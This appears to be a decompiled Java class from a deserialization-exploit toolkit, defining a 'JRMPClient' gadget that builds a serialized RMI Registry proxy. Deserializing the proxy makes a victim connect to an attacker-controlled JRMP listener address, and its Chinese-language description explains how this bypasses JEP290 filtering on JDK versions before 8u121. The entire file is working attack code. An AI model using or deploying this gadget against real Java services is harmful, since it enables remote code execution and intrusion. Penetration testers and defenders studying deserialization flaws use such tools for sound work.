package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

@GadgetAnnotation(name = "JRMPClient", description = "java.rmi.server.RemoteObjectInvocationHandler\nJEP290（8u121）默认只为RMI注册表（RMI Register层）和RMI分布式垃圾收集器（DGC层）提供了相应的内置过滤器，但是最底层的JRMP是没有做过滤器的, 所以可以绕过 JEP290JRMPClient 反序列化漏洞点: sun.rmi.transport.StreamRemoteCall#executeCall\nJRMP客户端反序列化顺序: \n\n1. 反序列化服务端给的returnType\n2. 反序列化服务端给的一个ID\n3. 反序列化服务端给的报错信息(Payload位置)", dependencies = {"jdk < 8u121"}, authors = {Authors.MBECHLER})
@GadgetTags(tags = {Tag.JavaNativeDeserialize, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/JRMPClient.class */
public class JRMPClient implements Gadget {

    @Param(name = "JRMPListener Address", description = "eg: 127.0.0.1:1234")
    public String address = "127.0.0.1:1234";

    public Object getObject() throws Exception {
        String substring;
        int intValue;
        int indexOf = this.address.indexOf(58);
        if (indexOf < 0) {
            intValue = new Random().nextInt(65535);
            substring = this.address;
        } else {
            substring = this.address.substring(0, indexOf);
            intValue = Integer.valueOf(this.address.substring(indexOf + 1)).intValue();
        }
        return (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{Registry.class}, new RemoteObjectInvocationHandler(new UnicastRef(new LiveRef(new ObjID(new Random().nextInt()), new TCPEndpoint(substring, intValue), false))));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
